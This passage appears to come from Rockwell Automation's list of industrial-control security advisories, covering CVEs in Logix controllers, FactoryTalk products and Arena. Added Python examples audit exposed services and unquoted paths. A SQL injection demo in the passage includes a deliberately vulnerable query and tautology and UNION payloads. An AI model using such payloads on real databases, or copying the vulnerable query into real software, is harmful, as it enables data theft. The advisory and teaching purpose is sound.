A privilege escalation vulnerability exists in the affected product. The vulnerability allows low-privilege users to edit scripts, bypassing Access Control Lists, and potentially gaining further access within the system.

CVSS 3.1 Base Score: 7.8/10

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5/10

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-732: Incorrect Permission Assignment for Critical Resource

Known Exploited Vulnerability (KEV) database: No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.    

  • JSON CVE-2024-37369

High
SD1673 | Multicast Request Causes major nonrecoverable fault on Select Controllers
Published Date:
June 12, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2024-5659
CVSS Scores (v3.1):
7.4
CVSS Scores (v4.0):
8.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Published Date: June 11, 2024

Last updated: June 11, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.4/10, 4.0: 8.3/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 | V34.011 | V34.014, V35.013, V36.011 and later
GuardLogix 5580 | V34.011 | V34.014, V35.013, V36.011 and later
1756-EN4 | V4.001 | V6.001 and later
CompactLogix 5380 | V34.011 | V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 | V34.011 | V34.014, V35.013, V36.011 and later
CompactLogix 5480 | V34.011 | V34.014, V35.013, V36.011 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

Rockwell Automation was made aware of a vulnerability that causes all affected controllers on the same network to enter a major nonrecoverable fault (MNRF/Assert). This vulnerability could be exploited by sending abnormal packets to the mDNS port. If exploited, the availability of the device would be compromised.

CVE-2024-5659 IMPACT

CVSS Base Score v3.1: 7.4/10

CVSS Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS Base Score v4.0: 8.3/10

CVSS Vector String: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: CWE-670: Always Incorrect Flow Implementation

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply the risk mitigations, where possible.

·       Users who do not use Automatic Policy Deployment (APD) should block the mDNS port, 5353, to help prevent communication.

·       Enable CIP Security. CIP Security with Rockwell Automation Products Application Technique

·       Security Best Practices

ADDITIONAL RESOURCES

·       JSON CVE-2024-5659

SD1672 | IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats
Published Date:
May 21, 2024
Last Updated:
August 07, 2025
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

IMPORTANT NOTICE: Rockwell Automation Reiterates Customer Guidance to Disconnect Devices from the Internet to Protect from Cyber Threats

Due to heightened world tensions and negative cyber activity, Rockwell Automation suggests customers take IMMEDIATE action. Customers should check if they have devices facing the public internet. If so, remove that connectivity for devices not designed for public internet connectivity.

Rockwell Automation has guidance for all devices not specifically designed for public internet connectivity. Users should never configure their devices to be directly connected to the public-facing internet. Removing that connectivity as a proactive step reduces the attack surface. This can immediately reduce exposure to unauthorized and malicious cyber activity from external threat actors.

Rockwell Automation and CISA (Cybersecurity and Infrastructure Security Agency) provide more information on attacks on public-internet-exposed assets. This includes information on how to identify exposed assets and disconnect them from the public internet.

  • Rockwell Automation | Advisory on web search tools that identify ICS devices and systems connected to the Internet [login required]
  • CISA | NSA and CISA Recommend Immediate Actions to Reduce Exposure Across Operational Technologies and Control Systems
  • CISA | How-to Guide: Stuff Off Shodan
  • Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity

Rockwell Automation suggests customers follow the security best practices if disconnection is not possible: Rockwell Automation | Security Best Practices [login required].
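The guidance above asks customers to identify devices that face the public internet. The Python script below is an added example, not a Rockwell Automation or CISA tool: it takes an asset inventory (here a constructed list of fictional hosts) and flags any entry whose address is globally routable and that has an industrial or remote-access service open. The port table and the inventory format are assumptions made for the example. Python's `ipaddress` module treats RFC 1918 space, CGNAT shared space (100.64.0.0/10) and the RFC 5737 documentation ranges as non-global, so those rows are not flagged, and a malformed address is reported for manual review rather than silently skipped.

```python
"""Flag inventory entries that expose ICS/OT or remote-access services on globally routable
addresses. Added example; the port table and inventory format are assumptions, not part of
the advisory."""
import ipaddress
from dataclasses import dataclass

# Services that should never be reachable from the public internet (assumed list; extend it
# with whatever your own inventory tracks).
EXPOSED_SERVICE_PORTS = {
    44818: "EtherNet/IP (CIP explicit messaging)",
    2222: "EtherNet/IP (CIP implicit I/O)",
    502: "Modbus/TCP",
    102: "ISO-TSAP / S7comm",
    20000: "DNP3",
    5353: "mDNS",
    3389: "RDP",
    5900: "VNC",
}


@dataclass(frozen=True)
class Finding:
    host: str
    address: str
    port: int       # 0 when the row could not be evaluated
    service: str
    reason: str


def is_internet_facing(address: str) -> bool:
    """True only for globally routable addresses.

    RFC 1918 private space, loopback, link-local, CGNAT shared space (100.64.0.0/10) and the
    RFC 5737 documentation ranges all return False. Raises ValueError for a malformed address.
    A device on a non-global address can still be reachable through NAT or port forwarding,
    so False here is a necessary, not a sufficient, condition for "not exposed".
    """
    return ipaddress.ip_address(address).is_global


def find_exposures(inventory: list) -> list:
    """Inventory rows look like {'host': str, 'address': str, 'open_ports': [int, ...]}."""
    findings = []
    for row in inventory:
        try:
            exposed = is_internet_facing(row["address"])
        except ValueError:
            # Do not drop unparseable rows silently; an inventory typo can hide a real exposure.
            findings.append(Finding(row["host"], row["address"], 0, "",
                                    "unparseable address, verify manually"))
            continue
        if not exposed:
            continue
        for port in row.get("open_ports", []):
            if port in EXPOSED_SERVICE_PORTS:
                findings.append(Finding(row["host"], row["address"], port,
                                        EXPOSED_SERVICE_PORTS[port],
                                        "service reachable on a public address"))
    return findings


# Constructed sample inventory: fictional hosts; the two "public" addresses are arbitrary
# placeholders chosen only because the standard library classifies them as global.
SAMPLE_INVENTORY = [
    {"host": "plc-line1", "address": "192.168.10.21", "open_ports": [44818, 2222]},  # RFC 1918
    {"host": "hmi-cell3", "address": "51.15.22.33", "open_ports": [44818, 443]},    # global
    {"host": "historian", "address": "77.88.99.100", "open_ports": [5450, 3389]},   # global
    {"host": "pf527-drive", "address": "100.64.3.9", "open_ports": [44818, 80]},    # CGNAT
    {"host": "doc-range", "address": "203.0.113.45", "open_ports": [502]},          # RFC 5737
    {"host": "bad-row", "address": "not-an-ip", "open_ports": [502]},               # malformed
]

if __name__ == "__main__":
    for f in find_exposures(SAMPLE_INVENTORY):
        print(f"{f.host} {f.address}:{f.port} {f.service} -> {f.reason}")
```

A clean result is not proof of safety: a device on a private address can still be reachable through a NAT or port-forwarding rule, which is why the CISA "Stuff Off Shodan" guide also recommends checking from the outside. In real use, feed the script the export of your asset inventory or of an external scan.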

Customers should be aware of the following related CVEs and ensure mitigations are in place (CVE number, CISA alert code, advisory name and URL):

  • CVE-2021-22681, ICSA-21-056-03: CISA | Rockwell Automation Logix Controllers (Update A), https://www.cisa.gov/news-events/ics-advisories/icsa-21-056-03
  • CVE-2022-1159, ICSA-22-090-07: CISA | Rockwell Automation Studio 5000 Logix Designer, https://www.cisa.gov/news-events/ics-advisories/icsa-22-090-07
  • CVE-2023-3595, ICSA-23-193-01: CISA | Rockwell Automation Select Communication Modules, https://www.cisa.gov/news-events/ics-advisories/icsa-23-193-01
  • CVE-2023-46290, ICSA-23-299-06: CISA | Rockwell Automation FactoryTalk Services Platform, https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-06
  • CVE-2024-21914, ICSA-24-086-04: CISA | Rockwell Automation FactoryTalk View ME, https://www.cisa.gov/news-events/ics-advisories/icsa-24-086-04
  • CVE-2024-21915, ICSA-24-046-16: CISA | Rockwell Automation FactoryTalk Service Platform, https://www.cisa.gov/news-events/ics-advisories/icsa-24-046-16
  • CVE-2024-21917, ICSA-24-030-06: CISA | Rockwell Automation FactoryTalk Service Platform, https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-06

High
SD1671 | FactoryTalk® Remote Access™ Has Unquoted Executables
Published Date:
May 07, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-3640
CVSS Scores (v3.1):
7.7
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: May 14, 2024

Last updated: August 6, 2025

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 7.0

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® Remote Access™ (FTRA) | v13.5.0.174 | v13.6

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-3640 IMPACT

An unquoted executable path exists in the affected product. When the FTRA installer package runs, the path of the executable it launches is not properly quoted, so a threat actor could place a malicious executable along that path and have it run as the SYSTEM user. This could result in code execution if exploited. A threat actor needs administrative privileges to exploit this.
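The root cause described above is CWE-428, and the same defect is common in Windows service definitions, where it is easy to audit. The Python below is an added example (not Rockwell Automation's code and not the FTRA installer's logic): it checks a set of service image paths, flags those that contain spaces but are not quoted, and lists the file names Windows' CreateProcess search would try before the intended binary. The service names and paths are constructed for the demonstration; the `NoExtension` row shows the conservative handling of a path without an `.exe` suffix.

```python
"""CWE-428 audit: find unquoted service image paths with spaces and list the hijack candidates.
Added example; service names and paths below are constructed, not taken from the advisory."""
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class UnquotedPathFinding:
    service: str
    image_path: str
    # File names Windows would try, in order, before reaching the intended executable.
    hijack_candidates: list = field(default_factory=list)


def executable_path(image_path: str) -> tuple:
    """Return (executable portion of the image path, was_quoted).

    A leading double-quoted token is the executable and is safe. Otherwise the executable is
    taken to end at the first '.exe' followed by whitespace or end of string; if no '.exe' is
    present the whole value is treated as the path (conservative, may over-report).
    """
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:end] if end > 0 else s[1:]), True
    m = re.match(r"(.+?\.exe)(?:\s|$)", s, re.IGNORECASE)
    return (m.group(1) if m else s), False


def hijack_candidates(exe_path: str) -> list:
    """For an unquoted path, every space is a point where CreateProcess first tries the prefix
    (with .exe appended) as the program, e.g. C:\\Program.exe for C:\\Program Files\\..."""
    return [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]


def check_service(name: str, image_path: str) -> Optional[UnquotedPathFinding]:
    exe, quoted = executable_path(image_path)
    if quoted or " " not in exe:
        return None
    return UnquotedPathFinding(name, image_path, hijack_candidates(exe))


def audit_services(services: dict) -> list:
    """services maps service name -> ImagePath (as read from the service configuration)."""
    findings = []
    for name, path in services.items():
        finding = check_service(name, path)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample: fictional service names and paths.
SAMPLE_SERVICES = {
    "VendorRemoteAccessSvc": r"C:\Program Files\Vendor\Remote Access\RemoteAccessService.exe -svc",
    "QuotedSvc": r'"C:\Program Files\Vendor\Quoted Service\svc.exe" -svc',
    "SvcHostLike": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
    "NoExtension": r"C:\Tools\agent daemon",   # no .exe: whole value is treated as the path
}

if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES):
        print(f"{f.service}: {f.image_path}")
        for cand in f.hijack_candidates:
            # Exploitable only if the attacker can create this file; on a default install
            # neither C:\ nor C:\Program Files is writable by standard users.
            print(f"    would try first: {cand}")
```

On a Windows host the input can be collected with `Get-CimInstance Win32_Service | Select-Object Name, PathName` in PowerShell and passed to `audit_services`. A hit matters only when a lower-privileged user can write to one of the listed parent directories, so check those ACLs before treating it as exploitable.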

 

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-428: Unquoted Search Path or Element

 

CVSS Base Score v4.0: 7.0/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

Known Exploited Vulnerability (KEV) database:  No

 

Customers can use Stakeholder-Specific Vulnerability Categorization to create more environment specific categories.

 

Mitigations and Workarounds 

Customers using the affected software that are not able to upgrade to one of the corrected versions should use the security best practices. 

  • Security Best Practices

 

 ADDITIONAL RESOURCES

The link provides CVE information in Vulnerability Exploitability Exchange (VEX) format. This is machine readable and can be used to automate vulnerability management and tracking activities.     

 

  • JSON CVE-2024-3640

Glossary

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

Unquoted Executable Path: a vulnerability that occurs when a service or program is configured with an executable path that contains spaces and is not enclosed in quotes, so the system may resolve and run a different executable earlier in the path

Vulnerability Exploitability Exchange (VEX): a framework that allows software suppliers or other parties to assert the status of specific vulnerabilities in a particular product 

High
SD1670 | Datalog Function within FactoryTalk® View SE Contains SQL Injection Vulnerability
Published Date:
May 07, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2024-4609
CVSS Scores (v3.1):
7.6
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

 

Published Date:  May 15, 2024

Last updated: August 6, 2025  

May 22, 2024 - Updated corrected software versions

Revision Number: 2.0

CVSS Score: v3.1: 7.6/10, v4.0 8.8/10

 

The security of our products is important to us as your industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency with customers in all business environments.

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in software version | Corrected in software version
FactoryTalk® View SE | < v14 | v11, v12, v13, v14 or later

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.   

A security issue exists in the FactoryTalk® View SE Datalog function. A threat actor could inject a malicious SQL statement if the SQL database has no authentication in place or if legitimate credentials have been stolen. The attack could expose sensitive information, and the threat actor could then modify or delete data in the remote database. An attack only affects the HMI design time, not runtime.
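The Datalog issue above is a textbook SQL injection: user input reaches the statement text. As an added example (not FactoryTalk® View SE code; the table, column names and rows are constructed in an in-memory SQLite database), the Python below shows a tag-history query built by string formatting beside the same query with a bound parameter, then runs two payloads through both: a tautology that returns every row, and a UNION that reads the database's schema table, the kind of information exposure the advisory describes.

```python
"""SQL injection in a datalog-style query: string-built (vulnerable) beside parameterized (fixed).
Added example using an in-memory SQLite table; names and rows are constructed for the demo."""
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Stand-in for a datalog table; the rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TagValues (TagName TEXT, Val REAL, Stamp TEXT)")
    conn.executemany(
        "INSERT INTO TagValues VALUES (?, ?, ?)",
        [
            ("Line1_Speed", 120.5, "2024-05-01T10:00:00"),
            ("Line1_Temp", 71.2, "2024-05-01T10:00:00"),
            ("Boiler_Pressure", 14.7, "2024-05-01T10:00:00"),
        ],
    )
    return conn


def query_tag_vulnerable(conn: sqlite3.Connection, tag_name: str) -> list:
    # The tag name is pasted into the statement text, so whoever controls it controls the SQL.
    sql = f"SELECT TagName, Val FROM TagValues WHERE TagName = '{tag_name}'"
    return conn.execute(sql).fetchall()


def query_tag_fixed(conn: sqlite3.Connection, tag_name: str) -> list:
    # Bound parameter: the value travels separately from the statement and cannot alter its
    # structure, whatever quotes or keywords it contains.
    return conn.execute(
        "SELECT TagName, Val FROM TagValues WHERE TagName = ?", (tag_name,)
    ).fetchall()


# Two classic payloads: a tautology and a UNION that pulls the schema (information exposure).
TAUTOLOGY = "x' OR '1'='1"
SCHEMA_LEAK = "x' UNION SELECT name, 0 FROM sqlite_master --"


def demo() -> dict:
    conn = build_demo_db()
    return {
        "legit_vulnerable": query_tag_vulnerable(conn, "Line1_Temp"),
        "legit_fixed": query_tag_fixed(conn, "Line1_Temp"),
        "tautology_vulnerable": query_tag_vulnerable(conn, TAUTOLOGY),     # every row
        "tautology_fixed": query_tag_fixed(conn, TAUTOLOGY),               # no such tag
        "schema_leak_vulnerable": query_tag_vulnerable(conn, SCHEMA_LEAK),  # table names
        "schema_leak_fixed": query_tag_fixed(conn, SCHEMA_LEAK),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Parameter binding removes the injection; it does not address the other precondition the advisory names, an unauthenticated database or stolen credentials, so the SQL account used by the design-time tooling should also be limited to the tables and operations it needs.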

 

CVE-2024-4609 IMPACT

CVSS v3.1 Base Score: 7.6

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

 

CVSS v4.0 Base Score: 8.8

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

 

Mitigations and Workarounds 

Customers using the affected software that are not able to upgrade to one of the corrected versions should use security best practices.  

 

  • Security Best Practices  

 

ADDITIONAL RESOURCES

The link provides CVE information in Vulnerability Exploitability Exchange (VEX) format. This is machine readable and can be used to automate vulnerability management and tracking activities.     

  • JSON CVE-2024-4609

     

Glossary

  • HMI Design Time: the process of creating and designing Human-Machine Interface screens
  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
  • SQL Statement: Used to communicate with databases. A statement is a command to be understood by the interpreter and executed by the SQL engine.
  • Vulnerability Exploitability Exchange (VEX): a framework that allows software suppliers or other parties to assert the status of specific vulnerabilities in a particular product
High
SD1669 | FactoryTalk® Historian SE Vulnerable to AVEVA-2024-001 and AVEVA-2024-002
Published Date:
May 06, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2023-31274, CVE-2023-34348
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: May 9, 2024

Last updated: August 5, 2025

Revision Number: 1.0

CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

 

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | Affected Versions | Corrected in software version
FactoryTalk® Historian SE | v9.0 and earlier | v9.01 and later

SECURITY ISSUE DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following security issues. 

CVE-2023-31274 IMPACT

FactoryTalk® Historian SE uses the AVEVA PI Server, which contains a security issue that could allow an unauthenticated user to cause a partial denial-of-service condition by consuming available memory in the PI Message Subsystem of the PI Server. The issue exists in FactoryTalk® Historian SE versions 9.0 and earlier. Exploitation could cause FactoryTalk® Historian SE to become unavailable, requiring a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component

 

CVE-2023-34348 IMPACT

FactoryTalk® Historian SE uses the AVEVA PI Server, which contains a security issue that could allow an unauthenticated user to remotely crash the PI Message Subsystem of the PI Server, resulting in a denial-of-service condition. The issue exists in FactoryTalk® Historian SE versions 9.0 and earlier. Exploitation could cause FactoryTalk® Historian SE to become unavailable, requiring a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

 

Mitigations and Workarounds 

Customers using the affected software should install FactoryTalk® Historian SE version 9.01 or higher as soon as feasible. For customers unable to upgrade to v9.01, defensive measures are available in the Rockwell Automation Knowledgebase article [login required]:

  • https://idp.rockwellautomation.com/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3Drockwellautomation.custhelp.com%26RelayState%3Danswers%2Fanswer_view%2Fa_id%2F1150873

Customers should use our suggested security best practices to minimize the risks.

  • Security Best Practices

 

 ADDITIONAL RESOURCES

  • JSON CVE-2023-31274

  • JSON CVE-2023-34348

Glossary

Denial-of-Service: an attack that makes a system or device unavailable to its legitimate users, for example by overwhelming it with traffic or by triggering a crash

Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited

PI Message Subsystem: the part of the PI System that handles logging and messaging. It is responsible for managing PI Logs, which are binary files located in the PI\Log folder on a PI Server or PIPC\Log on clients and interface nodes

Critical
SD1668 | FactoryTalk® Production Centre Vulnerable to Apache ActiveMQ Vulnerability
Published Date:
April 18, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2023-46604
CVSS Scores (v3.1):
9.8
Known Exploited Vulnerability (KEV):
Yes
Corrected:
Yes
Workaround:
No

Published Date: April 16, 2024

Last updated: April 16, 2024

Revision Number: 1.0

CVSS Score: 9.8 /10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

FactoryTalk® Production Centre

10.0

11.03.00

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerability. The security of our products is important to us as your chosen industrial automation supplier. This issue was found internally during routine testing and is being reported based on our commitment to transparency with customers and to improving their business and production environments.

 

CVE-2023-46604 IMPACT

Apache ActiveMQ, a component used in FactoryTalk® Production Centre, is vulnerable to remote code execution. A remote threat actor with network access to a broker could run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol, causing the broker to instantiate any class on the classpath.

CVSS Base Score: 9.8

CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-502: Deserialization of Untrusted Data

Known Exploited Vulnerability (KEV) database: Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible. 

  • Update to the version that fixes the issue, as detailed in this article.
  • Follow the security recommendations in PN1592 for FTPC.
  • Implement Security Best Practices

 ADDITIONAL RESOURCES

  • JSON CVE-2023-46604

Critical
SD1666 | ControlLogix® and GuardLogix® Vulnerable to Major Nonrecoverable Fault Due to Invalid Header Value
Published Date:
April 11, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-3493
CVSS Scores (v3.1):
8.6
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: April 11, 2024

Last updated: August 5, 2025

Revision Number: 2.0

May 2, 2024 - Added products to the Affected Products and Solution section

CVSS Score: v3.1: 8.6/10, v4.0: 9.2/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in Firmware Revision | Corrected in Firmware Revision
ControlLogix® 5580 | V35.011 | V35.013, V36.011 and later
GuardLogix 5580 | V35.011 | V35.013, V36.011 and later
CompactLogix 5380 | V35.011 | V35.013, V36.011 and later
Compact GuardLogix 5380 | V35.011 | V35.013, V36.011 and later
1756-EN4TR | V5.001 | V6.001 and later
ControlLogix 5580 Process | V35.011 | V35.013, V36.011 and later
CompactLogix 5380 Process | V35.011 | V35.013, V36.011 and later
CompactLogix 5480 | V35.011 | V35.013, V36.011 and later

SECURITY ISSUE DETAILS  

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following security issues. 

CVE-2024-3493 IMPACT

A specific malformed fragmented packet type can cause a Major Nonrecoverable Fault (MNRF). The affected product could become unavailable and require a manual restart to recover it. An MNRF could result in a loss of view and/or control of connected devices.

CVSS Base Score v3.1: 8.6/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVSS Base Score v4.0: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: CWE-20: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to create more environment-specific categories.

 

Mitigations and Workarounds  

Customers using the affected software that are not able to upgrade to one of the corrected versions should use the security best practices.  

  • Security Best Practices

     

 ADDITIONAL RESOURCES

The link provides CVE information in Vulnerability Exploitability Exchange (VEX) format. This is machine readable and can be used to automate vulnerability management and tracking activities.     

  • JSON CVE-2024-3493

Glossary

  • Fragmented Packet: a packet split into pieces so that it fits the maximum transmission unit of the network; fragments may be generated automatically by devices that send large amounts of data
  • Known Exploited Vulnerability (KEV) database: an official list of security flaws that attackers have actively exploited
  • Major Nonrecoverable Fault (MNRF): an error that occurs in a system or device and prevents it from recovering or functioning properly
  • Vulnerability Exploitability Exchange (VEX): a framework that allows software suppliers or other parties to assert the status of specific vulnerabilities in a particular product
SD1667 | Input/output Device Vulnerable to Major Nonrecoverable Fault
Published Date:
April 11, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-2424
Products:
5015-AENFTXT
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: April 11, 2024

Last updated: April 17, 2024

Revision Number: 2.0

April 17, 2024 - Updated Affected Products and Solution section

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | First Known in firmware version | Corrected in firmware version
5015-AENFTXT | v2.011 | v2.012 and later

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-2424 IMPACT

An input validation vulnerability exists in the affected product: a malformed PTP (Precision Time Protocol) packet causes the secondary adapter to enter a major nonrecoverable fault (MNRF). If exploited, the availability of the device is impacted and a manual restart is required to recover it.

 

CVSS Base Score v3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score v4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

 

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.  

  • Security Best Practices

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

  • JSON CVE-2024-2424

 

High
SD1665 | Arena® Simulation Vulnerabilities
Published Date:
March 26, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-21912, CVE-2024-21913, CVE-2024-2929, CVE-2024-21918, CVE-2024-21919, CVE-2024-21920
Products:
Arena® Simulation Software
CVSS Scores (v3.1):
7.8, 4.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Arena® Simulation Vulnerabilities

Published Date: March 26, 2024
Last updated: August 5, 2025
Revision Number: 1.0
CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
Arena® Simulation Software | CVE-2024-21912 | 16.00 | 16.20.03
Arena® Simulation Software | CVE-2024-21913, CVE-2024-2929, CVE-2024-21918, CVE-2024-21919, CVE-2024-21920 | 16.00 | Not remediated: the issue is within a Microsoft dynamic-link library (DLL) file. Do not open untrusted files from unknown sources to mitigate the issue.

SECURITY ISSUE DETAILS

These security issues were reported to Rockwell Automation by Michael Heinzl.  Rockwell Automation uses the latest version of the CVSS scoring system to assess the following security issues.

 

CVE-2024-21912 IMPACT

An arbitrary code execution security issue could let a threat actor insert unauthorized code into the software. This is done by writing beyond the designated memory area. This causes an access violation. The threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupt file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21913 IMPACT

A heap-based memory buffer overflow security issue could allow a threat actor to insert unauthorized code into the software. This is done by overstepping the memory boundaries, which triggers an access violation. A threat actor could then run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To use this, the user would unknowingly need to open a corrupt file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-122: Heap-based Buffer Overflow

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-2929 IMPACT

